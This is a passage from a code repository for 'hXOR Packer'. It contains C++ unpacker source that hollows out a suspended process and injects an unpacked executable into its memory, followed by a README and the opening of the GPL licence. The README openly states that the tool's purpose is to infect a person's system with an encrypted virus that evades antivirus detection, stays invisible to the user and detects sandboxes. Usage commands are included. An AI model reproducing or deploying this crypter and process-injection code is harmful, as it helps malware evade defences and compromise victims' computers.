dummyProcessName; 190 | return PEerrorDummyProcessFail; 191 | } 192 | 193 | fseek(dummyInFile,0,SEEK_END); 194 | 195 | // Get file size 196 | dummySize = ftell(dummyInFile); 197 | //printf("local file size of dummyProcessName : %lu\n", dummySize); 198 | 199 | rewind(dummyInFile); 200 | 201 | // Allocate memory for dummy file and fill it with zeros 202 | dummyFile = new LPVOID[dummySize]; 203 | ZeroMemory(dummyFile,dummySize); 204 | 205 | // Read all the zero memory of file 206 | fread(dummyFile,dummySize,1,dummyInFile); 207 | 208 | // Close file 209 | fclose(dummyInFile); 210 | 211 | // Grab the DOS Headers 212 | memcpy(&dummyDosHeader,dummyFile,sizeof(dummyDosHeader)); 213 | 214 | // Checking for dos signature 215 | if(dummyDosHeader.e_magic != IMAGE_DOS_SIGNATURE){ 216 | delete [] dummyProcessName; 217 | delete [] dummyFile; 218 | return PEerrorInputNotEXE; 219 | } 220 | 221 | // Grab NT Headers 222 | memcpy(&dummyNtHeader,(LPVOID)((long int)dummyFile+dummyDosHeader.e_lfanew),sizeof(dummyDosHeader)); 223 | 224 | // Checking for NT sigmature 225 | if(dummyNtHeader.Signature != IMAGE_NT_SIGNATURE){ 226 | delete [] dummyProcessName; 227 | delete [] dummyFile; 228 | return PEerrorInputNotEXE; 229 | } 230 | 231 | // Deallocate 232 | delete [] dummyFile; 233 | 234 | // Get Size and Image Base 235 | dummyImageBase = dummyNtHeader.OptionalHeader.ImageBase; 236 | dummyImageSize = dummyNtHeader.OptionalHeader.SizeOfImage; 237 | /******************************************************************** 238 | Getting all required data from the EXE inside you 239 | to prepare for Forking Process. 240 | *********************************************************************/ 241 | // Grabbing DOS Header from the EXE inside you 242 | memcpy(&dsDosHeader,lpImage,sizeof(dsDosHeader)); 243 | 244 | if(dsDosHeader.e_magic != IMAGE_DOS_SIGNATURE){ 245 | delete [] dummyProcessName; 246 | return PEerrorInputNotEXE; 247 | } 248 | 249 | // Grabbing DOS Header from the EXE inside you 250 | memcpy(&ntNtHeader,(LPVOID)((long int)lpImage+dsDosHeader.e_lfanew),sizeof(ntNtHeader)); 251 | 252 | if(ntNtHeader.Signature != IMAGE_NT_SIGNATURE){ 253 | delete [] dummyProcessName; 254 | return PEerrorInputNotEXE; 255 | } 256 | 257 | // Getting the proper sizes 258 | lImageSize = ntNtHeader.OptionalHeader.SizeOfImage; 259 | lHeaderSize = ntNtHeader.OptionalHeader.SizeOfHeaders; 260 | 261 | // Allocatting memory for the EXE image 262 | lpImageMemory = new LPVOID[lImageSize]; 263 | ZeroMemory(lpImageMemory,lImageSize); 264 | 265 | lpImageMemoryDummy = lpImageMemory; 266 | 267 | // Getting the sections 268 | lFirstSection = (long int)(((long int)lpImage+dsDosHeader.e_lfanew) + sizeof(IMAGE_NT_HEADERS)); 269 | 270 | memcpy(shSections,(LPVOID)(lFirstSection),sizeof(IMAGE_SECTION_HEADER)*ntNtHeader.FileHeader.NumberOfSections); 271 | memcpy(lpImageMemoryDummy,lpImage,lHeaderSize); 272 | 273 | // Get Section Alignment using Modulo 274 | if((ntNtHeader.OptionalHeader.SizeOfHeaders % ntNtHeader.OptionalHeader.SectionAlignment) == 0){ 275 | lJumpSize = ntNtHeader.OptionalHeader.SizeOfHeaders; 276 | }else{ 277 | lJumpSize = (ntNtHeader.OptionalHeader.SizeOfHeaders/ntNtHeader.OptionalHeader.SectionAlignment); 278 | lJumpSize += 1; 279 | lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment); 280 | } 281 | 282 | lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize); 283 | 284 | // Copy Sections To Buffer 285 | for(lSectionCount = 0; lSectionCount < ntNtHeader.FileHeader.NumberOfSections; lSectionCount++){ 286 | lJumpSize = 0; 287 | lSectionSize = shSections[lSectionCount].SizeOfRawData; 288 | 289 | memcpy(lpImageMemoryDummy,(LPVOID)((long int)lpImage + shSections[lSectionCount].PointerToRawData),lSectionSize); 290 | 291 | if((shSections[lSectionCount].Misc.VirtualSize % ntNtHeader.OptionalHeader.SectionAlignment)==0){ 292 | lJumpSize = shSections[lSectionCount].Misc.VirtualSize; 293 | }else{ 294 | lJumpSize = (shSections[lSectionCount].Misc.VirtualSize/ntNtHeader.OptionalHeader.SectionAlignment); 295 | lJumpSize += 1; 296 | lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment); 297 | } 298 | 299 | lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize); 300 | } 301 | 302 | ZeroMemory(&suStartUpInformation,sizeof(STARTUPINFO)); 303 | ZeroMemory(&piProcessInformation,sizeof(PROCESS_INFORMATION)); 304 | ZeroMemory(&cContext,sizeof(CONTEXT)); 305 | 306 | suStartUpInformation.cb = sizeof(suStartUpInformation); 307 | /******************************************************************** 308 | Writing the lpImageMemory into a new Process. 309 | - Create a Process in suspended mode to fork. 310 | - Changes the protection of virtual address space of the Process. 311 | - Reserves or commits a region of memory within the virtual 312 | address space of the Process, setting it all to zeros. 313 | - Writes lpImageMemory into the Process. 314 | *********************************************************************/ 315 | if(CreateProcess(NULL,dummyProcessName,NULL,NULL,false,CREATE_SUSPENDED,NULL,NULL,&suStartUpInformation,&piProcessInformation)){ 316 | cContext.ContextFlags = CONTEXT_FULL; 317 | GetThreadContext(piProcessInformation.hThread,&cContext); 318 | 319 | // Check image base and image size 320 | if(dummyImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= dummyImageSize) 321 | { 322 | VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,PAGE_EXECUTE_READWRITE,(unsigned long*)&lPreviousProtection); 323 | }else{ 324 | if(!NtUnmapViewOfSection(piProcessInformation.hProcess,(LPVOID)((DWORD)dummyImageBase))) 325 | VirtualAllocEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); 326 | } 327 | 328 | // Write Image to Process 329 | if(!(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lpImageMemory,lImageSize,(unsigned long*)&lWritten))){ 330 | delete [] dummyProcessName; 331 | delete [] lpImageMemory; 332 | return PEerrorWriteProcessFail; 333 | } 334 | 335 | // Set Image Base 336 | if(!(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)cContext.Ebx + 8),&ntNtHeader.OptionalHeader.ImageBase,4,(unsigned long*)&lWritten))){ 337 | delete [] dummyProcessName; 338 | delete [] lpImageMemory; 339 | return PEerrorWriteProcessFail; 340 | } 341 | /******************************************************************** 342 | Setting a new entry point. And Resume the Process 343 | *********************************************************************/ 344 | cContext.Eax = ntNtHeader.OptionalHeader.ImageBase + ntNtHeader.OptionalHeader.AddressOfEntryPoint; 345 | 346 | SetThreadContext(piProcessInformation.hThread,&cContext); 347 | 348 | if(dummyImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= dummyImageSize) 349 | VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,lPreviousProtection,0); 350 | 351 | // Resume the process 352 | ResumeThread(piProcessInformation.hThread); 353 | } 354 | 355 | delete [] dummyProcessName; 356 | delete [] lpImageMemory; 357 | 358 | return PESuccess; 359 | } 360 | 361 | /******************************************************************** 362 | Get the e_res value which stores the starting 363 | position of the packed content 364 | *********************************************************************/ 365 | int getInsertPosition(char *filename, long *pos){ 366 | FILE *packArchive = fopen(filename, "rb"); 367 | if (packArchive == NULL) 368 | return PEerrorCouldNotOpenArchive; 369 | 370 | IMAGE_DOS_HEADER idh; 371 | 372 | fread((void *)&idh, sizeof(idh), 1, packArchive); 373 | fclose(packArchive); 374 | *pos = *(long *)&idh.e_res2[0]; 375 | return PESuccess; 376 | } 377 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # hXOR Packer 2 | hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption. 3 | 4 | The unpacker will decompress and decrypt the packed PE and execute it directly from memory 5 | without needing any hard disk space to execute. 6 | 7 | This is my old school final year polytechnic project 2012 back then. 8 | 9 | For learning purposes, i will just copy paste the useful info from my rusty FYP report in the introduction onwards. 10 | 11 | ## How it is done? 12 | 1. Dynamic Process Forking Of Portable Executable 13 | 2. Huffman entropy encoding algorithm 14 | 3. Simple XOR encryption 15 | 16 | ## Usage 17 | ``` 18 | For Packing: 19 | (S) -> EXE File (Absolute Path) 20 | (D) -> Destination Output (Absolute Path) 21 | (P) -> Parameters (Optional) 22 | (K) -> Xor Encryption Key in numbers (Optional) 23 | 24 | Avaliable Parameters (Optional): 25 | -c Compression 26 | -e Encryption 27 | -ce Compression & Encryption 28 | 29 | Examples: 30 | - packer.exe (S) (D) (P) (K) 31 | - packer.exe C:\in.exe C:\folder\out.exe 32 | - packer.exe C:\in.exe C:\folder\out.exe -ce 56213 33 | ``` 34 | 35 | # Tools used 36 | ## Code::Blocks 37 | Code::Blocks is a free and open source cross-platform integrated development environment. It 38 | provides a source code editor, build automation tools, debugger and more. Code::Blocks uses lesser 39 | memory than the Microsoft Visual Studio. Code::Blocks also supports multiple compilers such 40 | as, MinGW or GCC, Digital Mars, Microsoft Visual C++, Borland C++, Watcom, LCC and the Intel C++ 41 | compiler. 42 | ## MinGW 43 | MinGW (28), which stands for Minimalist GNU for Windows, is a port of the GCC, GNU 44 | Compiler Collection. This is my primary compiler when I am compiling any C/C++ 45 | applications. 46 | 47 | # Knowledge and skills required 48 | - Portable Executable file format 49 | - Huffman entropy encoding algorithm 50 | - Dynamic Process Forking Of Portable Executable 51 | - XOR Encryption 52 | 53 | # Introduction 54 | The aim of this project is to create a Portable Executable Packers written in C++, which supports 55 | compression using Huffman algorithm, XOR encryption and executing an executable file from 56 | memory. I use Code::Blocks IDE and GCC compiler to make this project successful. 57 | 58 | In English language, packing means to prepare one or more items for proper storage and be ready 59 | for transportation. In this case, packing means to prepare one or more programs or a set of codes 60 | and compress it into one executable self-extracting archive, which is then ready to execute in any 61 | machine with an operating system capable reading the format of the packer, which is the Portable 62 | Executable Format. 63 | 64 | The format of a Portable Executable (PE) is the same for every executable file except for .NET PE. The 65 | operating system will read each every bit in the header as it contains the information on how the 66 | operating system should run the executable file. 67 | 68 | # Scope 69 | To create a PE (Portable Executable) Packer that allows users to crypt the source code of their 70 | program and compress the encrypted source code so that they will be not be detected and deleted 71 | by the antivirus. 72 | 73 | # Purpose 74 | The purpose of this project is to successfully infect a person operating system with the PE Packer. 75 | Inside the PE Packer, it will contain a encrypted source code of a virus and it will unpack, decrypt and 76 | compile itself during runtime. 77 | ## How does the hXOR Packer Works? 78 | By packing, it means to pack a executable file and either compress or encrypt it, as such, it nearly 79 | impossible for a user to notice a difference between a Packed Executable File and the 80 | original/unpacked Executable File without having the knowledge of reading the Packed Executable 81 | file in hexadecimal form, from a hex editor. 82 | 83 | The Portable Executable Packer that I’m writing will called hXOR.exe, which “h” simply stands for the 84 | Huffman algorithm and the XOR stands for “XOR” encryption that being used. 85 | Firstly, hXOR packer will validate if the input file is a valid executable file. By doing this validation, it 86 | will helps hXOR Un-Packer as it will assume that the executable file that it suppose to execute from 87 | memory is a valid executable file 88 | 89 | Secondly, it will check for any parameter that is being entered during execution. It can either; 90 | 1. Packs the Executable file without any compression nor encryption, 91 | 2. Packs the Executable file with only compression, 92 | 3. Packs the Executable file with encryption with key provided by the user, 93 | 4. Packs the Executable file with encryption without key provided by the user, 94 | 5. Packs the Executable file with both compression and encryption with the key provided by 95 | the user, 96 | 6. Packs the Executable file with both compression and encryption without the key provided by 97 | the user. 98 | 99 | Lastly, the packer will pack the executable file along the Un-Packer to create an output packed 100 | executable file. By adding the Un-Packer application at the very beginning of the encrypted and 101 | compressed executable file, the Un-Packer will decompress, decrypt and finally, execute the packed 102 | PE, making it impossible for normal user to notice that he/she has executed a packed PE. 103 | 104 | ### Functional Requirement 105 | - Packs input file 106 | - - User enter the input file directory 107 | - - The software will inform the user the output with only the output file directory. 108 | - Packs with Compression 109 | - - User enters input file directory with ‘-c’ as the parameter upon execution. 110 | - - The software compresses the input file. 111 | - - The software will inform the user the output with the output file size and output file 112 | directory on the command line. 113 | - Packs with Encryption without key provided 114 | - - User enters the input file directory with ‘-e’ as the parameter upon execution. 115 | - - The software will generate the key. 116 | - - The software encrypts the input file with the key generated. 117 | - - The software will inform the user the output with only the output file directory. 118 | - Packs with Encryption with key provided 119 | - - User enters the input file directory with ‘-e x’ as parameter where ‘x’ is the key and is in 120 | integer upon execution. 121 | - - The software will encrypt the input file with the provided key. 122 | - - The software will inform the user the output with only the output file directory. 123 | - Packs with Compression and Encryption without the key provided 124 | - - User enters the input file directory with ‘-ce’ as the parameter upon execution. 125 | - - The software will generate the key. 126 | - - The software will encrypt the input file with the key generated. 127 | - - The software will then compresses the encrypted input file 128 | - - The software will inform the user the output with the output file size and output file 129 | directory on the command line. 130 | - Packs with Compression and Encryption with the key provided 131 | - - User enters the input file directory with ‘-ce x’ as the parameter where ‘x’ is the key and 132 | is in integer upon execution. 133 | - - The software will encrypt the input file with the provided key. 134 | - - The software will then compresses the encrypted input file 135 | - - The software will inform the user the output with the output file size and output file 136 | directory on the command line. 137 | ### Non-Functional Requirement 138 | - Able to validate input file 139 | - - The software must have the ability to check the input file to make sure it is an 140 | executable file. 141 | - Able to accepts and validate parameters 142 | - - The software must have the ability to accept any parameter and validate them. 143 | - Command-line Interface 144 | - - The software must have a command-line interface. 145 | 146 | ## How does the hXOR Un-Packer Works? 147 | The Un-Packer is the only program that will not require a single input from the user during runtime. 148 | It is designed to have no graphical user interface. 149 | 150 | Firstly, the Un-Packer will look for the offset to the Packed Executable file in its own Image DOS 151 | Header. It will then create a pointer pointing to the starting position of the Packed Executable File. 152 | Secondly, the Un-Packer will begin to understand how the Packed Executable file was being packed 153 | by the Packer in order to unpack it. 154 | 155 | Lastly, without saving the Unpacked Executable File into the system hard disk, the Un-Packer will 156 | begin to create a child process and execute the Unpacked Executable File from the memory. It is the 157 | nearly impossible for a normal user to notice that the Executable File he/she just executed is actually 158 | a Packed Executable File and all this 3 steps have just happened quickly during execution. 159 | ### Functional Requirement 160 | None 161 | ### Non-Functional Requirement 162 | - Able to locate the Packed File 163 | - - The program must be able to locate the Packed File inside of itself. 164 | - Able to understand the Packed File 165 | - The program must be able to understand how the file was packed by the Packer, hXOR. 166 | - Invisible to the user 167 | - - The program must have no graphical interface and it will not open a command prompt 168 | window too. 169 | - Output visible in command line 170 | - - The program will be able to show output if user execute it from the command line 171 | instead of double clicking in the explorer.exe. 172 | - Execute from memory 173 | - - The program will have to execute the unpacked Executable File from the memory. 174 | - Able to scan running processes and detect environment 175 | - - The program will be able to detect if there is any defensive software that is interfering 176 | with the execution of itself, such as runtime scanning and isolated environment such as 177 | Sandboxie. 178 | 179 | # Binders vs Packers 180 | ## Binders 181 | A binder can accept and packs multiple file such as, executable files, pictures, music and more. While 182 | there are other alternatives such as, RAR, ZIP and 7z, a binder is a self-extracting archives which able 183 | to unpack itself and saves all the packed files to the system hard disk. This is useful for the receiver 184 | as he/she does not have to install an application to unpacks what he/she just received. 185 | If the user wants to execute or open a file inside a binder, it will create a copy of itself in the hard 186 | disk and execute from there. If a virus is using this method, the virus can be easily detected by most 187 | Antiviruses. 188 | 189 | ![Binders Demo](https://cdn.discordapp.com/attachments/240938506103422976/779000931571466240/unknown.png) 190 | 191 | ## Packers 192 | While a binder can packs multiple file, a packer can only accepts one. It is commonly used to packs, 193 | compress and encrypt an executable file, which we will call it “Packed Executable File”. 194 | Think of it as an executable file, inside another executable file, which also can be inside another 195 | executable file. 196 | 197 | Packer is well known to be used by malware authors and hackers because by using this method, it 198 | will be harder for the antivirus to detect their software. 199 | 200 | However, not all Packed Executable File is created for bad purposes. There are Software Companies 201 | that uses Packer to distribute their software to their customers. The main reason is to be able to 202 | reduce its application size during distributing. 203 | 204 | For example, if the application installer is more than 1 GB, the company will try to reduce it size to 205 | 700 MB so that it can save money by distributing it into a single CD-ROM rather than two CD-ROM or 206 | one DVD-ROM. Another reason is the bandwidth if the company decides to distribute it through the 207 | Internet. 208 | 209 | As there are more negative purpose of Packer than the positive ones, Antivirus Companies often 210 | label Packer that is unreadable by the antivirus as malware, suspicious or infected file, that which 211 | will be mark as false positive once they review it. 212 | 213 | ![Packer Demo](https://cdn.discordapp.com/attachments/240938506103422976/779001081741049856/unknown.png) 214 | 215 | 216 | # Portable Executable 217 | Portable Executable, also called PE, is a file format, usually in .exe, .dll and .sys file extensions. It 218 | was first introduced by Microsoft which first used in Windows NT version 3.1 in the year 1993. It can 219 | only be execute in Windows operating system or Linux/Unix-like operating system using WINE (Wine 220 | Is Not an Emulator) compatibility layer. 221 | 222 | ### Portable Executable File Structure 223 | PE file format is a modified version of the Unix COFF (Common Object File Format), a specification 224 | format for UNIX system to execute, object codes and shared library computer files. To make it 225 | compatible with previous version of Windows, the PE file format will retains the old popular MZ 226 | header from MS-DOS. 227 | 228 | The PE file format is organized in a linear stream of data. I will focus on the field in the headers that 229 | is relevant and important for the user and the system. First, it begins with: 230 | 231 | ![PE Header](https://cdn.discordapp.com/attachments/240938506103422976/779010925805174784/unknown.png) 232 | 233 | ### Image DOS header 234 | All EXE files will have a MZ header. To verify if a file can be executed in DOS, a signature of “MZ” at 235 | the very first 2 bytes will be present which is declared e_magic below. Another very important field 236 | in the DOS header is e_lfanew, an offset to the PE header. 237 | 238 | ![Image DOS header](https://cdn.discordapp.com/attachments/240938506103422976/779012034817687582/unknown.png) 239 | 240 | ### DOS stub program 241 | The DOS stub program is useful only for DOS system. It is present in every Win32 Executable file. The 242 | purpose of this stub is to ensure that the Win32 program will not crash when it is run on a DOS 243 | system. It will an output an error message such as, “This program cannot be run in DOS mode.” And 244 | exit. 245 | 246 | ### PE File Signature 247 | By using the e_lfanew located at the MS DOS header, you can get the offset to this PE header, which 248 | is also right after the DOS-Stub program. To ensure that this is a PE file, a signature for this, “PE00”, 249 | will be present in the signature field. 250 | 251 | ![PE File Signature](https://cdn.discordapp.com/attachments/240938506103422976/779015199490834523/unknown.png) 252 | 253 | ### Image File Header 254 | Right after the PE header is the PE File Header. The important information that most users are 255 | interested to know in this header is, 256 | 1. It will inform the operating system what “Machine” it is intended to run, 257 | 2. The number of sections in the section table. 258 | 3. Size of optional header, mainly used to know the correctness of the PE file structure 259 | 260 | ![Image File Header](https://cdn.discordapp.com/attachments/240938506103422976/779018406925565982/unknown.png) 261 | 262 | ### Image File Optional Header 263 | Following the File Header is the PE File Optional Header. Despite the name being optional, it will 264 | always be present in every PE file and it contains very important information on how to treat the PEfile exactly. 265 | The important information that most users are interested to know are, 266 | 1. The SizeOfCode, intended to be the size of the executable code. 267 | 2. SizeOfInitializedData, the size of initialized data. 268 | 3. SizeOfUninitializedData, the size of uninitialized data. 269 | 4. AddressIfEntryPoint, offset to the code’s entry point. This is used by the user if he loads the 270 | image by hand, for example, from memory. This address will start the process after the user 271 | has finish with all the fixups and the relocations. 272 | 5. ImageBase, this is the address that the file has been relocated by the linker. 273 | 6. SectionAlignment 274 | 7. SizeOfImage, the sum of all the headers and section length if aligned to the 275 | “SectionAlignment” 276 | 8. SizeOfHeaders, the total length of all the headers and including the data directories and 277 | section headers. 278 | 9. NumberOfRvaAndSizes, the number of valid entries in the directories. 279 | 10. And the Arrays of DataDirectory. 280 | 281 | ![Image File Optional Header](https://cdn.discordapp.com/attachments/240938506103422976/779020601007407134/unknown.png) 282 | 283 | ### Section Tables 284 | The Section Tables is located right after the optional header in the PE file format. This section Tables 285 | contains an array of structure and the number of array is determined by NumberOfSections field in 286 | the File Header above it. 287 | Each Section has its own, 288 | 1. Name 289 | 2. Permission 290 | 3. Size 291 | The operating system will, 292 | 1. Read the NumberOfSections in the PE File Header so that it will know how many section are 293 | there in the file 294 | 2. Use the SizeOfHeader as the file offset of the section table and moves the file pointer to that 295 | offset 296 | 3. It will obtain the Pointer ToRawData in this header mover the file pointer to that offset. 297 | 4. Then, it will read the value in the SizeOfRawData field so that the system will know how man 298 | bytes should he map to the memory and mark the attributes of the mapped memory using 299 | the value in the Characteristics field in this header. 300 | 301 | ![Section Tables Header](https://cdn.discordapp.com/attachments/240938506103422976/779023336419229716/unknown.png) 302 | 303 | ## Section Bodies 304 | Section bodies are the actual PE file data. It will depend on the section headers on how to use them. 305 | ### .NET PE File Structure 306 | Microsoft .NET Framework has extended the PE file format with features that supports the Common 307 | Language Runtime. There are two new sections included, CLR Header and CLR Metadata. 308 | ### CLR Header 309 | In order to get to the CLR Header, we have first to get to the 15th entry IMAGE_DATA_DIRECTORY in 310 | the Optional Header. It contains the offset to the CLR Header. 311 | 312 | ![Section Bodies](https://cdn.discordapp.com/attachments/240938506103422976/779023649378140190/unknown.png) 313 | ### CLR Metadata 314 | The CLR Metadata is directly after the CLR Header. It contains a signature and version information. 315 | 316 | ![Section Bodies](https://cdn.discordapp.com/attachments/240938506103422976/779023860414021653/unknown.png) 317 | 318 | ## Huffman Entropy Encoding Algorithm 319 | The Huffman coding uses a statistical technique. By using only C functions like, memset, memmove, 320 | qsort, malloc and memcpy, it can reduce the amount of bits used to represent a string of characters 321 | without using any external library such as STL or BoxedApp and more. It did not use a dictionary for 322 | reference as Huffman uses a tree. 323 | ### Header 324 | The header will be created by the compression program and will be used by the decompression 325 | program. It stores initial information for the decompression program to reconstruct the Huffman 326 | tree that was used by the compression program to compress the original file. It usually be located at 327 | the beginning of the compressed file. 328 | ### Compressing 329 | Firstly, a tree needs to be build in order to compress data using Huffman Algorithm 330 | #### Building a Huffman tree 331 | The Huffman tree contains nodes that representing the character, frequency, code and code length. 332 | Here is one example of a Huffman tree. 333 | An example: 334 | 335 | ![Huffman tree](https://cdn.discordapp.com/attachments/240938506103422976/779024203964743680/unknown.png) 336 | 337 | The Huffman tree is constructed by following this step: 338 | 1. Create a parentless node which can also known as child node, is being creating first. It will 339 | contain the character and the frequency of occurrence. 340 | 2. Select any two nodes with the lowest frequency. 341 | The only nodes containing character H, U, M, A, N are valid. 342 | Character F is not valid as it is currently has the highest frequency, 2. 343 | 3. Create a new node which will be the parent of the two previously selected nodes. 344 | The parent node will only contain the sum of the frequency of its child. 345 | 4. Repeat the step 2 and 3 until you reach only one parentless node left, which will be the root. 346 | Hence, the string “HUFFMAN” will be written as 000001101001011111 as the output of the 347 | compression. 348 | 349 | ### Decompressing 350 | Decompressing is very straight forward. The program will look for the tree in the compressed file 351 | header. It will then reconstruct the tree and use that information to get the original output or state 352 | of the compressed file. 353 | 354 | The decompression program has to return the data to its original 355 | state, from binary 000001101001011111 to the string “HUFFMAN”. 356 | 1. It will reconstruct the tree by reading the file header. The header which, the compression 357 | program stores the initial information of the Huffman tree. 358 | 2. It will then use the code and code length to find the parentless node which contains the 359 | original character. 360 | 361 | 362 | ## Dynamic Process Forking Of Portable Executable 363 | When Windows open up any file, it will make a copy of it into the memory. The same goes for 364 | executable file. 365 | 366 | When the file is in the memory, it will be called a module. The beginning of the file address is can be 367 | called HMODULE. By using the GetModuleFileName() API, you will be able to get the address to file 368 | in the memory, giving you the ability to locate the file and able to read or write the memory space. 369 | The data structure of the PE file on disk will be the same if it is loaded into the memory. 370 | 371 | Therefore, they are equal and loading a PE into memory is just mapping some ranges of the 372 | executable into the address space. What this also means, the data structure of the MZ DOS header 373 | on the disk will be equal to that in the memory. Windows usually decide which essential parts of the 374 | PE file should be mapped. 375 | 376 | The un-packer will create a new child process and replace its content with the unpacked executable 377 | file content. This allows the unpacked executable file load directly from memory. 378 | 379 | ![Dynamic Process Forking Of Portable Executable](https://cdn.discordapp.com/attachments/240938506103422976/779024613426069514/unknown.png) 380 | 381 | ## XOR Encryption 382 | Exclusive OR (XOR) encryption is and encryption that is almost unbreakable by brute force methods. 383 | ### How it works? 384 | It is very simple encryption to use and it strong brute force. The encryption uses bitwise XOR 385 | operation on the original data and a key. It will produce an encrypted data. 386 | 387 | The encrypted data can only be decrypted by using the bitwise XOR operation on the encrypted data 388 | and the same key. 389 | 390 | In XOR Encryption, I can reuse the same code for encrypting and decrypting. 391 | 392 | ![XOR Encryption](https://cdn.discordapp.com/attachments/240938506103422976/779024846007828500/unknown.png) 393 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 